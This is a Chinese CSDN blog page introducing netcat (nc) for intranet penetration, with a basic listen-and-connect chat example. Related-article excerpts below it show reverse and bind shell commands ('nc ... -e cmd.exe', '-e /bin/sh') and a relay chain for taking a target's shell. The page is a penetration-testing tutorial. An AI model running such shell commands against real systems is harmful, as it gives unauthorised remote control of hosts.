内网穿透(nc)

已于 2022-09-11 08:49:39 修改
阅读量3.7k 收藏 4
点赞数 3
CC 4.0 BY-SA版权
分类专栏: 优秀文章 秀秀 文章标签: 服务器 linux 网络
于 2022-06-28 22:54:27 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.youkuaiyun.com/qq_52549196/article/details/125509276

文章目录

内网穿透技术(nc)

Netcat常称为 nc,拥有“瑞士军刀”的美誉。

nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,
能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具
,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,
它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell

聊天

通过一边监听端口,一边发送消息去该端口,形成一个简易版本的服务端—客户端模型。

  • 服务器端:
nc   -lvp    8888

监听8888端口 -l 监听 -v 显示详细信息 -p 指定端口

  • 客户端:
nc  -nv  192.168.100.140  8888

连接到服务器的8888端口 -n指定数字的IP地址 -v显示详细信息

了解本专栏 订阅专栏 解锁全文
渗透测试6---神器nc,frp内网穿透,window下的netsh端口转发,window下的内网穿透工具lcx
初遇我ㄖ寸の热情呢?
04-14 9004
nc/netcat/ncat简史 nc是代理转发的神奇 nc被誉为网络安全界的瑞士军刀,端口扫描工具,也是一款安全工具,还能是一款监测工具,通过使用TCP或UDP协议的网络连接去读写数据 nc的版本非常乱,有很多版本。 传统版本:(有扫描功能,现代版本没有) netcat-traditional : Kali Linux默认的版本,命令为nc或netcat netcat-openbs...
内网渗透-内网代理穿透和内网横向移动
lza20001103的博客
09-23 3012
内网代理穿透和内网横向移动 文章目录内网代理穿透和内网横向移动前言内网代理穿透nctermite(ew)ssh正向代理(A,B,C)msf设置路由和sock4代理访问内网流量内网横向移动后记 前言 进入内网后,我们就要扫描内网中有哪些主机了,重点是我们外网是无法访问内网的主机的,所在网段是不一样的,这时就需要我们设置代理和路由进行访问内网的流量了。上一期讲解了信息收集的相关内容,收集网段,补丁和域中成员以及域控的信息,对以下的横向移动至关重要,对后期的提权做好了准备。 内网代理穿透 首先,我们介绍几种代理工
Nc内网穿透
qq_54713392的博客
06-10 574
Nc内网穿透 攻击机 ip 192.168.32.122 执行nc -lvp 3333 目标机 ip 192.168.1.5 执行nc -lvp 3333 -e c:\windows\system32\cmd.exe 中间机 ip 192.168.32.128 192.168.1.3 执行 nc -v 192.168.32.122 3333 -e “nc -v 192.168.1.5 3333” 在攻击机查看结果,已经拿到了目标机的shell ...
Linux网络内网穿透
最新发布
Sakura_ding的博客
05-17 1183
内网穿透是连接内网与公网的桥梁,通过合理选择工具和配置,可以在远程办公、个人服务搭建、开发测试等场景中发挥重要作用。但需注意安全风险,优先选择加密传输和权限控制功能完善的方案。随着云计算和边缘计算的发展,未来内网穿透技术可能进一步集成到云服务中,变得更加便捷和安全。内网打洞是P2P通信的核心技术,通过巧妙利用NAT设备的特性,实现了内网设备间的直接通信,在实时交互场景中具有不可替代的优势。尽管受限于NAT类型和防火墙策略,但其与STUN/TURN/ICE的结合已成为现代网络通信的基础设施。
内网穿透工具 -- nc
Python_paipai的博客
04-27 341
nc 小巧强悍,可以读写TCP或UDP网络连接,它被设计成一个可靠的后端工具,能被其它的程序或脚本直接驱动。同时,它又是一个功能丰富的网络调试和开发工具,因为它可以建立你可能用到的几乎任何类型的连接,以及一些非常有意思的内建功能,它基于socket协议工作。在渗透测试领域,我们通常利用它来反弹shell。
内网代理穿透1:nc代理穿透
da_chuan_chuan的博客
01-10 8461
文章目录前言一、nc的基本使用二、nc传文件三 、反弹shell总结 前言 nc是netcat的简写,有着网络界的瑞士军刀美誉。因为它短小精悍、功能实用,被设计为一个简单、可靠的网络工具。可以用来反弹shell、传输文件、端口扫描等。写这边博客主要是记录这个工具的用法,以免后面忘记。 一、nc的基本使用 nc可以作为服务端启动一个tcp监听,默认情况下是监听的一个tcp的端口,如: nc.exe -l -p 9999 客户端测试: 1、服务端建立监听之后,客户端只需要启动nc程序连接对应的IP和端口就
内网安全-内网穿透
分享
02-11 6114
内网穿透的简单介绍!工具介绍!
内网渗透(二)——连接shell、NC网络数据传输
qq_61562251的博客
12-10 1864
一、连接shellwebshell的定义:web下的执行环境,shell是用于与操作系统进行交互的用户界面在实战中,大多数采用反向shell,因为正向shell有很多因素导致连接失败,比如:硬件设备有防火墙、入侵检测系统、网站防火墙、端口被占用、权限不足等,一旦被防火墙拦截导致打草惊蛇、后期攻击相当繁琐。而被控制端主动向外发送的数据包通常都不会被拦截。二、反向shell1、工具:nc(netcat)nc,也称为netcat,是一款功能强大的网络工具,可以在网络上进行数据传输。
虚拟机+Ngrok进行内网穿透
造钞
04-19 916
笔者的虚拟机可以连接外网,主机或通过SSH远程也能连接我的虚拟机。当你访问网址为你自己构建的网页时,笔者的测试界面如下图:链接为:https://2e9b-220-89-248-151.ngrok-free.app/wx。将ngrok安装好后,采用 ngrok http 8080进行启动。控制中心选择Linux系统,按照他给出的步骤进行ngrok下载和安装。在ngrok官网注册好之后,登录管理界面后,会出现下图控制中心。即穿越成功,下面是测试代码,我用的微信公众号的开发文档中的例子。其它相关命令自行查询。
CS的下载+内网穿透
hellodaoyan的博客
05-31 981
NC连接后没有任何回显先受控房 nc.exe -l -p 12345然后攻击方 nc.exe ip port 12345扫描端口上传和 nc.exe 同一目录下的文件。
NC渗透测试
Letter_
05-10 1655
参考: http://www.freebuf.com/articles/system/10632.html http://www.waitalone.cn/linux-shell-rebound-under-way.html https://docs.python.org/2/py-modindex.html 大家在做渗透测试的时候,遇到linux服务器,想反弹shell
端口转发netcat(nc
02-12
端口转发工具 内网渗透 netcat(nc) 端口转发工具 内网渗透 netcat(nc
nc.exe 监听端口转发端口
02-25
NC监听软件,转发端口,适合windows平台,利器!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!
渗透神器系列】nc
lansefly1990的专栏
12-21 1173
【渗透神器系列】nc 发表于 2017-04-10   |   分类于 安全工具   |   热度 3125 ℃   工欲善其事,必先利其器   从事渗透测试工作几年了,在做项目过程中发现良好的渗透技术固然重要,但欲测试出更多的结果,离不开强大的工具。即使是能力超强的大牛,我想也不可能完全手工做渗透,毕竟渗透测试还是个体力活。   现在有些人认为渗透测试越来越简单了,因为开源的自动化工具...
内网穿透(Intranet Penetration)
qq_35598561的博客
06-01 1030
内网穿透(Intranet Penetration)
渗透测试工具-瑞士军刀NC
aming小老弟
01-15 9076
NC: netcat 一个简单、可靠的网络工具 nc的作用 (1)实现任意TCP/UDP端口的侦听 可作为server 以TCP或UDP方式侦听指定端口 (2)端口的扫描 nc可以作为client发起TCP或UDP连接 (3)机器之间传输文件 (4)机器之间网络测速 控制参数 -l 指定nc将处于侦听模式,被当作server 侦听并接受连接,而非向其它地址发起连接。 -p 暂未用到(老版本的nc可能需要在端口号前加-p参数) -s 指定发送数据的源IP地址,适用于多网卡机 -u 指定nc使用U
使用nc 实现ssh 公网控制内网
gtinlian的博客
05-10 1894
安装nc yum -y install nc nc -l -p 555 #再公网服务器上监听 nc {host}:{port} -e /bib/sh #{host} 公网服务器ip :{port} 公网服务器端口
DuplexPipe二三事(三)——网络中转站:端口映射
子清行
09-04 3863
端口映射在《DuplexPipe二三事(二)》中介绍了瑞士军刀 nc 的用法:nc 就像给程序一张飞机票,让原本只能在本地执行的程序也能运行在网络上!但网络和现实交通一样,很多地方需要中转才能到达(比如外网计算机无法直接访问公司内部 Web 服务器)。为实现公网对内部网络的访问,需要对数据进行转发(即端口映射)。比如内网“主机A”开启了 Web(port 80)服务,需要在“服务器的网关”
局域网内利用nc传输文件
zileqide的专栏
08-01 858
操作系统:ubuntu; 操作方式:命令行; 接收端:nc -l -p port > filename 发送端:nc destination_ip destination_port 实例: 接收端:nc -l -p 10000 > test.txt 发送端:nc 192.168.0.105 10000 注意事项:先接收端操作,接收端监听后,发送
docker nginx ssh 内网穿透
05-09
要在 Docker 容器中运行 Nginx 并使用 SSH 进行内网穿透,可以采用以下步骤: 1. 在 Docker 中运行 Nginx 可以使用以下命令来运行一个 Nginx 容器: ``` docker run -d --name nginx -p 80:80 nginx ``` 这将在 Docker 中创建一个名为 “nginx” 的容器,并将容器内的 80 端口映射到宿主机的 80 端口。可以通过访问宿主机的 IP 地址来访问 Nginx。 2. 安装 SSH 服务 在 Nginx 容器中安装 SSH 服务,可以使用以下命令: ``` docker exec -it nginx bash apt-get update apt-get install ssh ``` 这将在容器内安装 SSH 服务。 3. 配置 SSH 服务 编辑 SSH 配置文件 `/etc/ssh/sshd_config`,将以下内容添加到文件末尾: ``` GatewayPorts yes ``` 这将启用 SSH 网关端口转发功能,以便可以从公共网络访问 Docker 容器中的服务。 4. 启动 SSH 服务 使用以下命令启动 SSH 服务: ``` service ssh start ``` 5. 配置内网穿透 使用 ngrok 等工具,将宿主机的 SSH 端口映射到公共网络上。然后,使用 SSH 客户端连接到公共网络上的 ngrok 服务器,并将流量转发到 Docker 容器中的 SSH 服务。 例如,假设 ngrok 将宿主机的 SSH 端口映射到 `tcp://0.tcp.ngrok.io:12345`,则可以使用以下命令连接到 Docker 容器中的 SSH 服务: ``` ssh -p 12345 -o "ProxyCommand=nc -X 5 -x 127.0.0.1:1080 %h %p" root@localhost ``` 请注意,上述命令中的 `-o "ProxyCommand=nc -X 5 -x 127.0.0.1:1080 %h %p"` 部分是用于 SOCKS5 代理的,如果不需要代理,则可以省略此部分。 以上就是在 Docker 中运行 Nginx 并使用 SSH 进行内网穿透的步骤。
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

????27282

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值